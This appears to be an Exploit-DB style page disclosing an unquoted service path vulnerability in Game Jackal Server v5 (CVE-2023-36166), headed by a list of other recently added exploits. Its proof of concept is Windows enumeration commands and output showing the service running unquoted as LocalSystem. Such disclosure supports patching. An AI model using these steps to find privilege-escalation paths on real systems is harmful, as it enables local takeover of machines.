00f5021452
10 changes to exploits/shellcodes/ghdb Ateme TITAN File 3.9 - SSRF File Enumeration Netlify CMS 2.10.192 - Stored Cross-Site Scripting (XSS) Spring Cloud 3.2.2 - Remote Command Execution (RCE) BuildaGate5library v5 - Reflected Cross-Site Scripting (XSS) Park Ticketing Management System 1.0 - 'viewid' SQL Injection Park Ticketing Management System 1.0 - 'viewid' SQL Injection Frappe Framework (ERPNext) 13.4.0 - Remote Code Execution (Authenticated) AVG Anti Spyware 7.5 - Unquoted Service Path _AVG Anti-Spyware Guard_ Game Jackal Server v5 - Unquoted Service Path _GJServiceV5_ MiniTool Partition Wizard ShadowMaker v.12.7 - Unquoted Service Path _MTAgentService_ MiniTool Partition Wizard ShadowMaker v.12.7 - Unquoted Service Path _MTSchedulerService_
38 lines
No EOL
1.3 KiB
Text
38 lines
No EOL
1.3 KiB
Text
# Exploit Title: Game Jackal Server v5 - Unquoted Service Path
|
|
# Date: 06/07/2023
|
|
# Exploit Author: Idan Malihi
|
|
# Vendor Homepage: https://www.allradiosoft.ru
|
|
# Software Link: https://www.allradiosoft.ru/en/ss/index.htm
|
|
# Version: 5
|
|
# Tested on: Microsoft Windows 10 Pro
|
|
# CVE : CVE-2023-36166
|
|
|
|
#PoC
|
|
|
|
C:\Users>wmic service get name,pathname,displayname,startmode | findstr /i
|
|
auto | findstr /i /v "C:\Windows\\" | findstr /i /v """
|
|
Game Jackal Server v5
|
|
GJServiceV5 C:\Program Files
|
|
(x86)\SlySoft\Game Jackal v5\Server.exe Auto
|
|
|
|
C:\Users>sc qc GJServiceV5
|
|
[SC] QueryServiceConfig SUCCESS
|
|
|
|
SERVICE_NAME: GJServiceV5
|
|
TYPE : 10 WIN32_OWN_PROCESS
|
|
START_TYPE : 2 AUTO_START
|
|
ERROR_CONTROL : 1 NORMAL
|
|
BINARY_PATH_NAME : C:\Program Files (x86)\SlySoft\Game Jackal
|
|
v5\Server.exe
|
|
LOAD_ORDER_GROUP :
|
|
TAG : 0
|
|
DISPLAY_NAME : Game Jackal Server v5
|
|
DEPENDENCIES :
|
|
SERVICE_START_NAME : LocalSystem
|
|
|
|
C:\Users>systeminfo
|
|
|
|
Host Name: DESKTOP-LA7J17P
|
|
OS Name: Microsoft Windows 10 Pro
|
|
OS Version: 10.0.19042 N/A Build 19042
|
|
OS Manufacturer: Microsoft Corporation |